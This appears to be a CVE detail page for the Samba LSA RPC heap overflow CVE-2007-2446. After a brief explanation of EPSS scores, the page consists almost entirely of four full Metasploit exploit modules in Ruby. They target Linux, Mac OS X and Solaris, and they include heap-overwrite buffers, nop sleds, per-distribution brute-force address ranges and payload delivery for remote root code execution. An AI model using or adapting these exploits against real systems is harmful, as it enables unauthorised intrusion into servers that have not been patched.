CVE-2007-2446 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba lsa_io_trans_names Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additonally, this module will not work when the Samba "log level" parameter is higher than "2". }, 'Author' => [ 'ramon', 'Adriano Lima <[email protected]>', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2446'], ['OSVDB', '34699'], ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, # no limit really }, 'Platform' => 'linux', 'DefaultOptions' => { 'PrependSetresuid' => true, 'PrependSetreuid' => true, 'PrependSetuid' => true, }, 'Targets' => [ ['Linux vsyscall', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xffffe410 }, 'Stop' => { 'Ret' => 0xffffe413 }, 'Step' => 1, } } ], ## # 08356000-0843d000 rwxp 08356000 00:00 0 (Debian) # KF # 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo) # hdm # b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon # 80365000-80424000 rwxp 80365000 00:00 0 (SUSE) # Adriano/Ramon # 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware) # Adriano/Ramon # 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu) # hdm # 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP) # Andrew # ## ['Linux Heap Brute Force (Debian/Ubuntu)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x08352000 }, 'Stop' => { 'Ret' => 0x0843d000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (Gentoo)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x80310000 }, 'Stop' => { 'Ret' => 0x8042f000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (Mandriva)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x80380000 }, 'Stop' => { 'Ret' => 0x8045b000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (RHEL/CentOS)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xb800f000 }, 'Stop' => { 'Ret' => 0xb80c9000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (SUSE)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x80365000 }, 'Stop' => { 'Ret' => 0x80424000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (Slackware)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x8033c000 }, 'Stop' => { 'Ret' => 0x80412000 }, 'Step' => 60*1024, } } ], ['DEBUG', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xAABBCCDD }, 'Stop' => { 'Ret' => 0xAABBCCDD }, 'Step' => 4, } } ], ], 'DisclosureDate' => 'May 14 2007', 'DefaultTarget' => 0 )) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) end # Need to perform target detection def autofilter begin connect() smb_login() disconnect() if (smb_peer_lm() =~ /Samba/i) true else false end rescue ::Exception false end end def check autofilter() ? CheckCode::Detected : CheckCode::Safe end def brute_exploit(target_addrs) if(not @nops) if (target['Nops'] > 0) print_status("Creating nop sled....") @nops = make_nops(target['Nops']) else @nops = '' end # @nops = "\xcc" * (@nops.length) end print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret']) nops = @nops pipe = datastore['SMBPIPE'].downcase print_status("Connecting to the SMB service...") connect() smb_login() datastore['DCERPC::fake_bind_multi'] = false handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") jumper = "P" * 256 jumper[24, 5] = "\xe9" + [-5229-11-5-(nops.length/2)].pack('V') num_entries = 256 num_entries2 = 272 # first talloc_chunk # 16 bits align # 16 bits sid_name_use # 16 bits uni_str_len # 16 bits uni_max_len # 32 bits buffer # 32 bits domain_idx buf = (('A' * 16) * num_entries) # padding buf << 'A' * 8 # TALLOC_MAGIC talloc_magic = "\x70\xec\x14\xe8" # second talloc_chunk header buf << 'A' * 8 # next, prev buf << NDR.long(0) + NDR.long(0) # parent, child buf << NDR.long(0) # refs buf << [target_addrs['Ret']].pack('V') # destructor buf << 'A' * 4 # name buf << 'A' * 4 # size buf << talloc_magic # flags buf << jumper stub = lsa_open_policy(dcerpc) stub << NDR.long(0) # num_entries stub << NDR.long(0) # ptr_sid_enum stub << NDR.long(num_entries) # num_entries stub << NDR.long(0x20004) # ptr_trans_names stub << NDR.long(num_entries2) # num_entries2 stub << buf stub << nops stub << payload.encoded print_status("Calling the vulnerable function...") begin # LsarLookupSids dcerpc.call(0x0f, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError print_good('Server did not respond, this is expected') rescue Rex::Proto::DCERPC::Exceptions::Fault print_error('Server is most likely patched...') rescue => e if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ print_good('Server disconnected, this is expected') else print_error("Error: #{e.class}: #{e}") end end handler disconnect end def lsa_open_policy(dcerpc, server="\\") stubdata = # Server NDR.uwstring(server) + # Object Attributes NDR.long(24) + # SIZE NDR.long(0) + # LSPTR NDR.long(0) + # NAME NDR.long(0) + # ATTRS NDR.long(0) + # SEC DES # LSA QOS PTR NDR.long(1) + # Referent NDR.long(12) + # Length NDR.long(2) + # Impersonation NDR.long(1) + # Context Tracking NDR.long(0) + # Effective Only # Access Mask NDR.long(0x02000000) res = dcerpc.call(6, stubdata) dcerpc.last_response.stub_data[0,20] end end

## # $Id: lsa_transnames_heap.rb 9828 2010-07-14 17:27:23Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba lsa_io_trans_names Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additonally, this module will not work when the Samba "log level" parameter is higher than "2". }, 'Author' => [ 'ramon', 'Adriano Lima <[email protected]>', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9828 $', 'References' => [ ['CVE', '2007-2446'], ['OSVDB', '34699'], ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, # no limit really }, 'Platform' => 'linux', 'DefaultOptions' => { 'PrependSetresuid' => true, 'PrependSetreuid' => true, 'PrependSetuid' => true, }, 'Targets' => [ ['Linux vsyscall', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xffffe410 }, 'Stop' => { 'Ret' => 0xffffe413 }, 'Step' => 1, } } ], ## # 08356000-0843d000 rwxp 08356000 00:00 0 (Debian) # KF # 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo) # hdm # b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon # 80365000-80424000 rwxp 80365000 00:00 0 (SUSE) # Adriano/Ramon # 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware) # Adriano/Ramon # 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu) # hdm # 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP) # Andrew # ## ['Linux Heap Brute Force (Debian/Ubuntu)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x08352000 }, 'Stop' => { 'Ret' => 0x0843d000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (Gentoo)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x80310000 }, 'Stop' => { 'Ret' => 0x8042f000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (Mandriva)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x80380000 }, 'Stop' => { 'Ret' => 0x8045b000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (RHEL/CentOS)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xb800f000 }, 'Stop' => { 'Ret' => 0xb80c9000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (SUSE)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x80365000 }, 'Stop' => { 'Ret' => 0x80424000 }, 'Step' => 60*1024, } } ], ['Linux Heap Brute Force (Slackware)', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 64*1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x8033c000 }, 'Stop' => { 'Ret' => 0x80412000 }, 'Step' => 60*1024, } } ], ['DEBUG', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Nops' => 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xAABBCCDD }, 'Stop' => { 'Ret' => 0xAABBCCDD }, 'Step' => 4, } } ], ], 'DisclosureDate' => 'May 14 2007', 'DefaultTarget' => 0 )) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) end def check begin connect() smb_login() disconnect() if (smb_peer_lm() =~ /Samba/i) return CheckCode::Detected else return CheckCode::Safe end rescue ::Exception return CheckCode::Safe end end def brute_exploit(target_addrs) if(not @nops) if (target['Nops'] > 0) print_status("Creating nop sled....") @nops = make_nops(target['Nops']) else @nops = '' end # @nops = "\xcc" * (@nops.length) end print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret']) nops = @nops pipe = datastore['SMBPIPE'].downcase print_status("Connecting to the SMB service...") connect() smb_login() if ! @checked_peerlm if smb_peer_lm !~ /Samba 3\.0\.2[1234]/i raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})" end end @checked_peerlm = true datastore['DCERPC::fake_bind_multi'] = false handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") jumper = "P" * 256 jumper[24, 5] = "\xe9" + [-5229-11-5-(nops.length/2)].pack('V') num_entries = 256 num_entries2 = 272 # first talloc_chunk # 16 bits align # 16 bits sid_name_use # 16 bits uni_str_len # 16 bits uni_max_len # 32 bits buffer # 32 bits domain_idx buf = (('A' * 16) * num_entries) # padding buf << 'A' * 8 # TALLOC_MAGIC talloc_magic = "\x70\xec\x14\xe8" # second talloc_chunk header buf << 'A' * 8 # next, prev buf << NDR.long(0) + NDR.long(0) # parent, child buf << NDR.long(0) # refs buf << [target_addrs['Ret']].pack('V') # destructor buf << 'A' * 4 # name buf << 'A' * 4 # size buf << talloc_magic # flags buf << jumper stub = lsa_open_policy(dcerpc) stub << NDR.long(0) # num_entries stub << NDR.long(0) # ptr_sid_enum stub << NDR.long(num_entries) # num_entries stub << NDR.long(0x20004) # ptr_trans_names stub << NDR.long(num_entries2) # num_entries2 stub << buf stub << nops stub << payload.encoded print_status("Calling the vulnerable function...") begin # LsarLookupSids dcerpc.call(0x0f, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError print_status('Server did not respond, this is expected') rescue Rex::Proto::DCERPC::Exceptions::Fault print_error('Server is most likely patched...') rescue => e if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ print_status('Server disconnected, this is expected') else print_error("Error: #{e.class}: #{e}") end end handler disconnect end def lsa_open_policy(dcerpc, server="\\") stubdata = # Server NDR.uwstring(server) + # Object Attributes NDR.long(24) + # SIZE NDR.long(0) + # LSPTR NDR.long(0) + # NAME NDR.long(0) + # ATTRS NDR.long(0) + # SEC DES # LSA QOS PTR NDR.long(1) + # Referent NDR.long(12) + # Length NDR.long(2) + # Impersonation NDR.long(1) + # Context Tracking NDR.long(0) + # Effective Only # Access Mask NDR.long(0x02000000) res = dcerpc.call(6, stubdata) dcerpc.last_response.stub_data[0,20] end end

## # $Id: lsa_transnames_heap.rb 9021 2010-04-05 23:34:10Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba lsa_io_trans_names Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the szone_free() to overwrite the size() or free() pointer in initial_malloc_zones structure. }, 'Author' => [ 'ramon', 'Adriano Lima <[email protected]>', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9021 $', 'References' => [ ['CVE', '2007-2446'], ['OSVDB', '34699'], ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, }, 'Platform' => 'osx', 'DefaultOptions' => { 'PrependSetresuid' => true, }, 'Targets' => [ ['Mac OS X 10.4.x x86 Samba 3.0.10', { 'Platform' => 'osx', 'Arch' => [ ARCH_X86 ], 'Nops' => 4 * 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x01818000 }, 'Stop' => { 'Ret' => 0x01830000 }, 'Step' => 3351, }, } ], ['Mac OS X 10.4.x PPC Samba 3.0.10', { 'Platform' => 'osx', 'Arch' => [ ARCH_PPC ], 'Nops' => 1600, 'Bruteforce' => { 'Start' => { 'Ret' => 0x01813000 }, 'Stop' => { 'Ret' => 0x01830000 }, 'Step' => 796, } } ], ['DEBUG', { 'Platform' => 'osx', 'Arch' => [ ARCH_X86 ], 'Nops' => 4 * 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xaabbccdd }, 'Stop' => { 'Ret' => 0xaabbccdd }, 'Step' => 0, } } ], ], 'DisclosureDate' => 'May 14 2007' )) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) end # Handle a strange byteswapping issue on PPC def ppc_byteswap(addr) data = [addr].pack('N') (data[1,1] + data[0,1] + data[3,1] + data[2,1]).unpack('N')[0] end def brute_exploit(target_addrs) if(not @nops) if (target['Nops'] > 0) print_status("Creating nop sled....") @nops = make_nops(target['Nops']) else @nops = '' end end print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret']) pipe = datastore['SMBPIPE'].downcase print_status("Connecting to the SMB service...") connect() smb_login() datastore['DCERPC::fake_bind_multi'] = false handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") num_entries = 256 num_entries2 = 257 # # First talloc_chunk # 16 bits align # 16 bits sid_name_use # 16 bits uni_str_len # 16 bits uni_max_len # 32 bits buffer # 32 bits domain_idx # buf = (('A' * 16) * num_entries) # Padding buf << 'A' * 4 # # Use the szone_free() to overwrite the size() pointer in # initial_malloc_zones structure. # size_pointer = 0x1800008 # Initial nops array nops = '' # x86 if (target.arch.include?(ARCH_X86)) # # We don't use the size() pointer anymore because it # results in a unexpected behavior when smbd process # is started by launchd. # free_pointer = 0x1800018 nop = "\x16" # # First talloc_chunk # 16 bits align # 16 bits sid_name_use # 16 bits uni_str_len # 16 bits uni_max_len # 32 bits buffer # 32 bits domain_idx # # First nop block buf = ((nop * 16) * num_entries) # # A nop block of 0x16 (pushl %ss) and the address of # 0x1800014 results in a jns instruction which when # executed will jump over the address written eight # bytes past our target address by szone_free() (the # sign flag is zero at the moment our target address is # executed). # # 0x357b ^ ( 0x1800014 ^ 0x16161616 ) = 0x17962379 # # This is the output of the sequence of xor operations # 0: 79 23 jns 0x25 # 2: 96 xchgl %eax,%esi # 3: 17 popl %ss # 4: 16 pushl %ss # 5: 16 pushl %ss # 6: 16 pushl %ss # 7: 16 pushl %ss # 8: 14 00 adcb $0x0,%al # a: 80 01 16 addb $0x16,(%ecx) # # This jump is needed because the ecx register does not # point to a valid memory location in free() context # (it is zero). # # The jump will hit our nop block which will be executed # until it reaches the payload. # # Padding nops buf << nop * 2 # Jump over the pointers buf << "\xeb\x08" # Pointers buf << [target_addrs['Ret']].pack('V') buf << [free_pointer - 4].pack('V') # # We expect to hit this nop block or the one before # the pointers. # buf << nop * (3852 - 8 - payload.encoded.length) # Payload buf << payload.encoded # Padding nops buf << nop * 1024 stub = lsa_open_policy(dcerpc) stub << NDR.long(0) # num_entries stub << NDR.long(0) # ptr_sid_enum stub << NDR.long(num_entries) # num_entries stub << NDR.long(0x20004) # ptr_trans_names stub << NDR.long(num_entries2) # num_entries2 stub << buf # PPC else # # The first half of the nop sled is an XOR encoded branch # instruction. The second half is a series of unencoded nop # instructions. The result is: # # > This is the decoded branch instruction # 0x181c380: bl 0x181c6a0 # # > The size pointer is written below this # 0x181c384: .long 0x1800004 # # > Followed by the encoded branch sled # 0x181c388: ba 0x180365c # [ ... ] # # > The branch lands in the normal nop sled # 0x181c6a0: andi. r17,r16,58162 # [ ... ] # # > Finally we reach our payload :-) # size_pointer = size_pointer - 4 sled = target['Nops'] jump = [ 0x357b ^ ( size_pointer ^ (0x48000001 + sled / 2 )) ].pack('N') nops = (jump * (sled / 8)) + @nops[0, sled / 8] addr_size = ppc_byteswap(size_pointer) addr_ret = ppc_byteswap(target_addrs['Ret']) # This oddness is required for PPC buf << [addr_size].pack('N') buf << [addr_ret ].pack('N')[2,2] buf << [addr_ret ].pack('N') # Padding buf << "A" * (256 - 10) stub = lsa_open_policy(dcerpc) stub << NDR.long(0) # num_entries stub << NDR.long(0) # ptr_sid_enum stub << NDR.long(num_entries) # num_entries stub << NDR.long(0x20004) # ptr_trans_names stub << NDR.long(num_entries2) # num_entries2 stub << buf stub << nops stub << payload.encoded end print_status("Calling the vulnerable function...") begin # LsarLookupSids dcerpc.call(0x0f, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError print_status('Server did not respond, this is expected') rescue Rex::Proto::DCERPC::Exceptions::Fault print_error('Server is most likely patched...') rescue => e if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ print_status('Server disconnected, this is expected') else print_error("Error: #{e.class}: #{e}") end end handler disconnect end def lsa_open_policy(dcerpc, server="\\") stubdata = # Server NDR.uwstring(server) + # Object Attributes NDR.long(24) + # SIZE NDR.long(0) + # LSPTR NDR.long(0) + # NAME NDR.long(0) + # ATTRS NDR.long(0) + # SEC DES # LSA QOS PTR NDR.long(1) + # Referent NDR.long(12) + # Length NDR.long(2) + # Impersonation NDR.long(1) + # Context Tracking NDR.long(0) + # Effective Only # Access Mask NDR.long(0x02000000) res = dcerpc.call(6, stubdata) dcerpc.last_response.stub_data[0,20] end end

## # $Id: lsa_transnames_heap.rb 9021 2010-04-05 23:34:10Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba lsa_io_trans_names Heap Overflow', 'Description' => %q{ This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba "log level" parameter is higher than "2". }, 'Author' => [ 'ramon', 'Adriano Lima <[email protected]>', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9021 $', 'References' => [ ['CVE', '2007-2446'], ['OSVDB', '34699'], ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, }, 'Platform' => 'solaris', 'Targets' => [ ['Solaris 8/9/10 x86 Samba 3.0.21-3.0.24', { 'Platform' => 'solaris', 'Arch' => [ ARCH_X86 ], 'Nops' => 64 * 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x082f2000 }, 'Stop' => { 'Ret' => 0x084f2000 }, 'Step' => 60 * 1024, } } ], ['Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24', { 'Platform' => 'solaris', 'Arch' => [ ARCH_SPARC ], 'Nops' => 64 * 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0x00322000 }, 'Stop' => { 'Ret' => 0x00722000 }, 'Step' => 60 * 1024, } } ], ['DEBUG', { 'Platform' => 'solaris', 'Arch' => [ ARCH_X86 ], 'Nops' => 64 * 1024, 'Bruteforce' => { 'Start' => { 'Ret' => 0xaabbccdd }, 'Stop' => { 'Ret' => 0xaabbccdd }, 'Step' => 60 * 1024, } } ], ], 'DisclosureDate' => 'May 14 2007', 'DefaultTarget' => 0 )) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), ], self.class) end # Need to perform target detection def autofilter false end def brute_exploit(target_addrs) if(not @nops) if (target['Nops'] > 0) print_status("Creating nop sled....") @nops = make_nops(target['Nops']) else @nops = '' end end print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret']) nops = @nops pipe = datastore['SMBPIPE'].downcase print_status("Connecting to the SMB service...") connect() smb_login() datastore['DCERPC::fake_bind_multi'] = false handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") num_entries = 272 num_entries2 = 288 # # First talloc_chunk # 16 bits align # 16 bits sid_name_use # 16 bits uni_str_len # 16 bits uni_max_len # 32 bits buffer # 32 bits domain_idx # buf = (('A' * 16) * num_entries) # Padding buf << 'A' * 8 # TALLOC_MAGIC talloc_magic = "\x70\xec\x14\xe8" # Second talloc_chunk header buf << 'A' * 8 # next, prev buf << NDR.long(0) + NDR.long(0) # parent, child buf << NDR.long(0) # refs buf << [target_addrs['Ret']].pack('V') # destructor buf << 'A' * 4 # name buf << 'A' * 4 # size buf << talloc_magic # flags stub = lsa_open_policy(dcerpc) stub << NDR.long(0) # num_entries stub << NDR.long(0) # ptr_sid_enum stub << NDR.long(num_entries) # num_entries stub << NDR.long(0x20004) # ptr_trans_names stub << NDR.long(num_entries2) # num_entries2 stub << buf stub << nops stub << payload.encoded print_status("Calling the vulnerable function...") begin # LsarLookupSids dcerpc.call(0x0f, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError print_status('Server did not respond, this is expected') rescue Rex::Proto::DCERPC::Exceptions::Fault print_error('Server is most likely patched...') rescue => e if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ print_status('Server disconnected, this is expected') else print_error("Error: #{e.class}: #{e}") end end handler disconnect end def lsa_open_policy(dcerpc, server="\\") stubdata = # Server NDR.uwstring(server) + # Object Attributes NDR.long(24) + # SIZE NDR.long(0) + # LSPTR NDR.long(0) + # NAME NDR.long(0) + # ATTRS NDR.long(0) + # SEC DES # LSA QOS PTR NDR.long(1) + # Referent NDR.long(12) + # Length NDR.long(2) + # Impersonation NDR.long(1) + # Context Tracking NDR.long(0) + # Effective Only # Access Mask NDR.long(0x02000000) res = dcerpc.call(6, stubdata) dcerpc.last_response.stub_data[0,20] end end